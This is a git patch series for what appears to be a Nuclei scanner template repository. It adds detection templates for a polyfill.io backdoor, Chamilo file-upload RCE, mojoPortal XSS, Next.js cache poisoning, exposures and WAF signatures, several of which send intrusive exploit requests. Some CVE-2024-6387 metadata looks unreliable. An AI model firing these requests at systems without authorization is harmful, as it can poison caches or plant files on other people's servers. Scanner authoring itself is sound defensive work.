From 704c1aa4b7e33ec5f391acd044818f82ce554f97 Mon Sep 17 00:00:00 2001 From: Hiroki Matsue <1086548+Matsue@users.noreply.github.com> Date: Mon, 1 Jul 2024 17:23:52 +0900 Subject: [PATCH 001/247] Update severity of polyfill-backdoor to high --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index bc5da88601e..e65efaee935 100644 --- a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -3,7 +3,7 @@ id: polyfill-backdoor info: name: Polyfill.io - Detection author: kazet - severity: low + severity: high description: | The polyfill.io CDN was suspected to serve malware. reference: From 12d4df0e3a9c75f9cecda45e44eab75a608ed266 Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani <38619429+omranisecurity@users.noreply.github.com> Date: Wed, 3 Jul 2024 11:29:28 +0330 Subject: [PATCH 002/247] Create snoop-servlet-exposure.yaml --- .../configs/snoop-servlet-exposure.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/exposures/configs/snoop-servlet-exposure.yaml diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml new file mode 100644 index 00000000000..350cf27790f --- /dev/null +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -0,0 +1,23 @@ +id: snoop-servlet + +info: + name: Snoop Servlet information disclosure + author: omranisecurity + severity: medium + description: The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. + reference: https://www.acunetix.com/vulnerabilities/web/snoop-servlet-information-disclosure/ + metadata: + shodan-query: http.title:"Snoop Servlet" + fofa-query: title=="Snoop Servlet" + tags: config,exposure,snoop,snoop-servlet + +http: + - method: GET + path: + - "{{BaseURL}}/snoop" + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Snoop Servlet - Request/Client Information")' + condition: and From 806d45b62c094422de844b971fb1385839a34bfe Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani <38619429+omranisecurity@users.noreply.github.com> Date: Wed, 3 Jul 2024 11:33:31 +0330 Subject: [PATCH 003/247] Update snoop-servlet-exposure.yaml Severity change --- http/exposures/configs/snoop-servlet-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml index 350cf27790f..5ff4d3f827d 100644 --- a/http/exposures/configs/snoop-servlet-exposure.yaml +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -3,7 +3,7 @@ id: snoop-servlet info: name: Snoop Servlet information disclosure author: omranisecurity - severity: medium + severity: low description: The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. reference: https://www.acunetix.com/vulnerabilities/web/snoop-servlet-information-disclosure/ metadata: From c24dfb8a1079eb835202a33214c416be0988b2ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 8 Jul 2024 16:30:51 +0530 Subject: [PATCH 004/247] Create CVE-2023-44012.yaml --- http/cves/2023/CVE-2023-44012.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44012.yaml diff --git a/http/cves/2023/CVE-2023-44012.yaml b/http/cves/2023/CVE-2023-44012.yaml new file mode 100644 index 00000000000..a6b01f80b1f --- /dev/null +++ b/http/cves/2023/CVE-2023-44012.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-44012 + +info: + name: mojoPortal v.2.7.0.0 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability. + reference: + - https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012 + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2023-44012 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44012 + cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.37745 + cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mojoportal + product: mojoportal + fofa-query: title="mojoPortal" + tags: cve,cve2023,mojoportal,xss + +http: + - method: GET + path: + - "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'> Date: Tue, 9 Jul 2024 17:56:08 +0300 Subject: [PATCH 005/247] add CVE-2023-4220 --- http/cves/2023/CVE-2023-4220.yaml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4220.yaml diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml new file mode 100644 index 00000000000..bf21754170d --- /dev/null +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-4220 +info: + name: Chamilo LMS <= 1.11.24 - Remote Code Execution + author: securityforeveryone + severity: medium + description: | + Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. + reference: + - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit + - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 + - https://github.com/charlesgargasson/CVE-2023-4220 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4220 + cwe-id: CWE-434 + epss-score: 0.00163 + epss-percentile: 0.52876 + cpe: cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* + metadata: + vendor: chamilo + product: chamilo_lms + shodan-query: cpe:"cpe:2.3:a:chamilo:chamilo_lms" + tags: cve,cve2024,chamilo,lms,rce +variables: + filename: "{{rand_base(10)}}" + num: "{{rand_int(1000, 9999)}}" + +http: + - raw: + - | + POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3 + + --------------------------SwxF5rRaZb4lETWlpulXn3 + Content-Disposition: form-data; name="bigUploadFile"; filename="{{filename}}.txt" + Content-Type: application/octet-stream + + {{md5(num)}} + + --------------------------SwxF5rRaZb4lETWlpulXn3-- + + - | + GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2,"{{md5(num)}}")' + - 'status_code_1 == 200 && status_code_2 == 200' + condition: and \ No newline at end of file From 67b2934f4ed8469f807008d6d732af1410ea306e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 17:59:23 +0300 Subject: [PATCH 006/247] fix --- http/cves/2023/CVE-2023-4220.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index bf21754170d..31e7c3c23f6 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -21,7 +21,7 @@ info: vendor: chamilo product: chamilo_lms shodan-query: cpe:"cpe:2.3:a:chamilo:chamilo_lms" - tags: cve,cve2024,chamilo,lms,rce + tags: cve,cve2023,chamilo,lms,rce variables: filename: "{{rand_base(10)}}" num: "{{rand_int(1000, 9999)}}" @@ -40,7 +40,7 @@ http: {{md5(num)}} --------------------------SwxF5rRaZb4lETWlpulXn3-- - + - | GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} @@ -50,4 +50,4 @@ http: dsl: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' - condition: and \ No newline at end of file + condition: and From c40099f8a8cabd9464dc01d85a9cdb67bcc7deb0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 12:04:46 +0530 Subject: [PATCH 007/247] minor update --- http/cves/2023/CVE-2023-4220.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index 31e7c3c23f6..3f69ea23a4c 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -1,4 +1,5 @@ id: CVE-2023-4220 + info: name: Chamilo LMS <= 1.11.24 - Remote Code Execution author: securityforeveryone @@ -9,6 +10,7 @@ info: - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220 + - https://starlabs.sg/advisories/23/23-4220/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,8 +22,9 @@ info: metadata: vendor: chamilo product: chamilo_lms - shodan-query: cpe:"cpe:2.3:a:chamilo:chamilo_lms" - tags: cve,cve2023,chamilo,lms,rce + shodan-query: "X-Powered-By: Chamilo" + tags: cve,cve2023,chamilo,lms,rce,intrusive,file-upload + variables: filename: "{{rand_base(10)}}" num: "{{rand_int(1000, 9999)}}" From 3cda62a31f9c2bf59a90fac617a9afe48d49799e Mon Sep 17 00:00:00 2001 From: Sumanth Vankineni Date: Wed, 10 Jul 2024 02:36:19 -0700 Subject: [PATCH 008/247] Fixed issues for CVE-2023-33246 --- network/cves/2024/CVE-2024-6387.yaml | 38 ++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 network/cves/2024/CVE-2024-6387.yaml diff --git a/network/cves/2024/CVE-2024-6387.yaml b/network/cves/2024/CVE-2024-6387.yaml new file mode 100644 index 00000000000..0cbf0d87385 --- /dev/null +++ b/network/cves/2024/CVE-2024-6387.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-6387 + +info: + name: regreSSHion - Vulnerable SSH Authentication + author: Sumanth Vankineni + severity: high + description: | + The CVE-2024-6387 describes a vulnerability in the SSH service where malformed authentication requests can lead to unauthorized access. + remediation: Update to the latest version of SSH to mitigate this vulnerability. + reference: + - https://example.com/cve-2024-6387 + - https://nvd.nist.gov/vuln/detail/CVE-2024-6387 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6387 + cwe-id: CWE-287 + epss-score: 0.05 + epss-percentile: 0.95 + cpe: cpe:2.3:a:ssh:ssh:8.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ssh + product: ssh + tags: network,cve2024,cve,ssh,openssh,tcp + +tcp: + - host: + - "{{Hostname}}" + port: 22 + inputs: + - data: "SSH-2.0-ExampleClientStaticTest" + matchers: + - type: regex + regex: + - "SSH-2\\.0-OpenSSH_8\\.[5-9]" + - "SSH-2\\.0-OpenSSH_9\\.[0-7]" + part: data From 69ea991d595808ad62e7884c78c2370520727a60 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:53:43 +0530 Subject: [PATCH 009/247] Next.js Cache Poisoning using X-Middleware-Prefetch --- .../nextjs/nextjs-middleware-cache.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml new file mode 100644 index 00000000000..d1fb00608ee --- /dev/null +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -0,0 +1,52 @@ +id: nextjs-middleware-cache + +info: + name: Next.js Cache Poisoning using X-Middleware-Prefetch + author: DhiyaneshDk + severity: high + reference: + - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole + metadata: + verified: true + vendor: vercel + product: next.js + framework: node.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + tags: nextjs,cache + +variables: + rand: "{{rand_text_numeric(5)}}" + +http: + - raw: + - | + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + X-Middleware-Prefetch: 1 + Priority: u=1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + X-Middleware-Prefetch: 1 + Priority: u=1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1')" + - "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1')" + condition: and From 853fc36122193829e2fe70e977cb100f772c8e83 Mon Sep 17 00:00:00 2001 From: Pastaga Date: Wed, 10 Jul 2024 12:23:47 +0200 Subject: [PATCH 010/247] Create adcs-detect.yaml --- adcs-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 adcs-detect.yaml diff --git a/adcs-detect.yaml b/adcs-detect.yaml new file mode 100644 index 00000000000..4705dc4f92c --- /dev/null +++ b/adcs-detect.yaml @@ -0,0 +1,28 @@ +id: adcs-detect + +info: + name: ADCS Detection + author: pastaga,defte + severity: info + description: ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` + tags: ad,adcs + +http: + - method: GET + path: + - "{{BaseURL}}/certenroll" + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 300 + - 301 + - 302 + condition: or + + - type: word + words: + - "Location: {{BaseURL}}/certenroll/" + part: header From 63b4038a9161fb9166547f00d60b4081058107c6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:55:48 +0530 Subject: [PATCH 011/247] Create nextjs-rsc-cache.yaml --- .../nextjs/nextjs-rsc-cache.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml new file mode 100644 index 00000000000..9c454114c92 --- /dev/null +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -0,0 +1,52 @@ +id: nextjs-rsc-cache + +info: + name: Next.js Cache Poisoning using RSC + author: DhiyaneshDk + severity: high + reference: + - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole + metadata: + verified: true + vendor: vercel + product: next.js + framework: node.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + tags: next-js,cache + +variables: + rand: "{{rand_text_numeric(5)}}" + +http: + - raw: + - | + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Priority: u=1 + Rsc: 1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Priority: u=1 + Rsc: 1 + + - | + @timeout: 5s + GET /?cb={{rand}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_2 == 200 && contains(content_type_2, 'text/x-component')" + - "status_code_3 == 200 && contains(content_type_3, 'text/x-component')" + condition: and From f6b215570ead2baaaf72d36190ffc134ccdc032e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 15:57:30 +0530 Subject: [PATCH 012/247] fix trail space --- http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index d1fb00608ee..78b95503f8e 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -29,7 +29,7 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - + - | @timeout: 5s GET /?cb={{rand}} HTTP/1.1 From 090c620238c5eeb8eb35cb5c1e4723a158081132 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 16:00:05 +0530 Subject: [PATCH 013/247] minor update --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index 9c454114c92..9597d2d30f0 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -29,7 +29,7 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Priority: u=1 Rsc: 1 - + - | @timeout: 5s GET /?cb={{rand}} HTTP/1.1 From e8f3e6c762836918bcf371912d8ab4ef7da5338a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 Jul 2024 16:48:49 +0530 Subject: [PATCH 014/247] Update waf-detect.yaml --- http/technologies/waf-detect.yaml | 57 ++++++++++++++++++++++++++++++- 1 file changed, 56 insertions(+), 1 deletion(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index eecfd778b88..9a884f0deef 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -746,4 +746,59 @@ http: - '(?)content="CloudWAF"' - 'Server: CloudWAF' - 'Set-Cookie: HWWAFSESID=' -# digest: 490a0046304402205229eadf2567f1e73205f840656054fe2f167c6087611d957f79eeea3d1b2cd0022066ec38f2a9f60e5d2c1fc095899aade2bf1af5722bddd41d5e414b5c83979f68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - type: word + name: safe3webfirewall + part: header + words: + - "safe3 Web Firewall" + + - type: word + name: safedog + part: header + words: + - "X-Safe-Firewall" + - "safedog-flow" + condition: or + + - type: word + name: squarespace + part: header + words: + - "Squarespace" + - "Firewall_action" + condition: and + + - type: word + name: yunsuo + part: body + words: + - "yunsuologo" + + - type: word + name: godaddywebprotection + part: body + words: + - "GoDaddy Security" + - "seal.godaddy.com" + - "GoDaddy security" + condition: or + + - type: word + name: transipwebfirewall + part: header + words: + - "X-TransIP-Balancer" + + - type: word + name: xlabssecuritywaf + part: header + words: + - "Secured: By XLabs Security" + + - type: word + name: shieldonfirewall + part: header + words: + - "X-Protected-By: shieldon.io" + From bc4f0aaf8ddc0d8e16d9f53c920174dcfbc9b1bd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 16:51:48 +0530 Subject: [PATCH 015/247] fix error --- http/technologies/waf-detect.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 9a884f0deef..49b870cf3f1 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -746,7 +746,7 @@ http: - '(?)content="CloudWAF"' - 'Server: CloudWAF' - 'Set-Cookie: HWWAFSESID=' - + - type: word name: safe3webfirewall part: header @@ -800,5 +800,4 @@ http: name: shieldonfirewall part: header words: - - "X-Protected-By: shieldon.io" - + - "X-Protected-By: shieldon.io" From e4b8efd1e1cfa831751b702f6264613ad50eaf22 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:39:17 +0530 Subject: [PATCH 016/247] Update nextjs-rsc-cache.yaml --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index 9597d2d30f0..ca5ee6b84b0 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -1,7 +1,7 @@ id: nextjs-rsc-cache info: - name: Next.js Cache Poisoning using RSC + name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high reference: @@ -15,7 +15,7 @@ info: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" - tags: next-js,cache + tags: nextjs,cache variables: rand: "{{rand_text_numeric(5)}}" @@ -25,22 +25,18 @@ http: - | GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Priority: u=1 Rsc: 1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Priority: u=1 Rsc: 1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} From 0f98f845dd776edb8147cea719e000d07e7cab66 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:41:00 +0530 Subject: [PATCH 017/247] Update nextjs-middleware-cache.yaml --- .../nextjs/nextjs-middleware-cache.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index 78b95503f8e..ee2bd67def3 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -1,9 +1,11 @@ id: nextjs-middleware-cache info: - name: Next.js Cache Poisoning using X-Middleware-Prefetch + name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high + description: | + Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch. reference: - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole metadata: @@ -25,22 +27,18 @@ http: - | GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} From bfdd36b3663c492f96d535dd087be91914411351 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:42:07 +0530 Subject: [PATCH 018/247] Update CVE-2023-4220.yaml --- http/cves/2023/CVE-2023-4220.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index 3f69ea23a4c..4529ba46328 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -8,9 +8,9 @@ info: Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. reference: - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit - - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220 - https://starlabs.sg/advisories/23/23-4220/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-4220 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,6 +20,7 @@ info: epss-percentile: 0.52876 cpe: cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: chamilo product: chamilo_lms shodan-query: "X-Powered-By: Chamilo" From 502fa6948cfe45c8f24bc2f4b191c4b1cdab7929 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:42:57 +0530 Subject: [PATCH 019/247] added desc. --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index ca5ee6b84b0..6389b4aca44 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -4,6 +4,8 @@ info: name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high + description: | + Next.js is vulnerable to Cache Poisoning using RSC. reference: - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole metadata: From d1ebe94cfa6ac6e4858b36bde2a98fc9aeece7a5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:13:56 +0000 Subject: [PATCH 020/247] Auto Generated New Template Addition List [Wed Jul 10 18:13:56 UTC 2024] :robot: --- .new-additions | 76 +------------------------------------------------- 1 file changed, 1 insertion(+), 75 deletions(-) diff --git a/.new-additions b/.new-additions index 27ea1e9e241..a2d790ddcce 100644 --- a/.new-additions +++ b/.new-additions @@ -1,75 +1 @@ -dast/cves/2022/spring4shell-CVE-2022-22965.yaml -dast/vulnerabilities/injection/csv-injection.yaml -dast/vulnerabilities/injection/xinclude-injection.yaml -http/cnvd/2023/CNVD-2023-03903.yaml -http/cnvd/2024/CNVD-2021-64035.yaml -http/cves/2020/CVE-2020-10189.yaml -http/cves/2023/CVE-2023-3380.yaml -http/cves/2023/CVE-2023-35156.yaml -http/cves/2023/CVE-2023-35159.yaml -http/cves/2023/CVE-2023-35160.yaml -http/cves/2023/CVE-2023-35161.yaml -http/cves/2023/CVE-2023-41599.yaml 